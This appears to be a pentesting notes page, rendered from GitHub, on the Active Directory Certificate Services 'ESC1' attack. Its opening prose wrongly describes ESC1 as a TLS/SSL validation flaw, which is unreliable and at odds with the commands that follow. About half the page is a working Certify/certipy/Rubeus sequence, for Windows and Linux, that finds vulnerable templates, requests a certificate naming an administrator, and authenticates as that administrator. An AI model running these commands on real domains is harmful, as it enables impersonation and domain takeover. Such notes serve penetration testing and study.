Skip to content

Latest commit

 

History

History
70 lines (50 loc) · 2.15 KB

File metadata and controls

70 lines (50 loc) · 2.15 KB

🟢 ESC1 – Understand the Arbitrary Subject Alternative Name Vulnerability

ESC1 – Understand the Arbitrary Subject Alternative Name Vulnerability

The Arbitrary Subject Alternative Name (SAN) Vulnerability refers to a security flaw in certificate validation mechanisms of TLS/SSL protocols.

This vulnerability allows attackers to issue certificates that include unauthorized domain names in the SAN field, potentially enabling phishing attacks or man-in-the-middle (MITM) attacks.

It stems from inadequate verification of the entities that request certificates and the domains listed in the SAN field.

To mitigate this vulnerability, it's essential to:

  • Implement strict validation processes for certificate requests, ensuring that the entity requesting the certificate has legitimate control over the domains listed in the SAN field.
  • Use Certificate Transparency logs to monitor and identify potentially malicious certificates.
  • Employ modern TLS libraries and configurations that adhere to best practices in certificate validation.

To find vulnerable certificate templates you can run:

{% tabs %} {% tab title="Windows" %}

Certify.exe find /vulnerable

{% endtab %}

{% tab title="Linux" %}

certipy find -u john@corp.local -p Passw0rd -dc-ip 172.16.126.128

{% endtab %} {% endtabs %}

To abuse this vulnerability to impersonate an administrator one could run:

{% tabs %} {% tab title="Windows" %}

Certify.exe request /ca:dc.theshire.local-DC-CA /template:VulnTemplate /altname:localadmin

{% endtab %}

{% tab title="Linux" %}

certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC1' -alt 'administrator@corp.local'

{% endtab %} {% endtabs %}

Then you can transform the generated certificate to .pfx format and use it to authenticate using Rubeus or certipy again:

{% tabs %} {% tab title="Windows" %}

Rubeus.exe asktgt /user:localdomain /certificate:localadmin.pfx /password:password123! /ptt

{% endtab %}

{% tab title="Linux" %}

certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'corp.local' -dc-ip 

{% endtab %} {% endtabs %}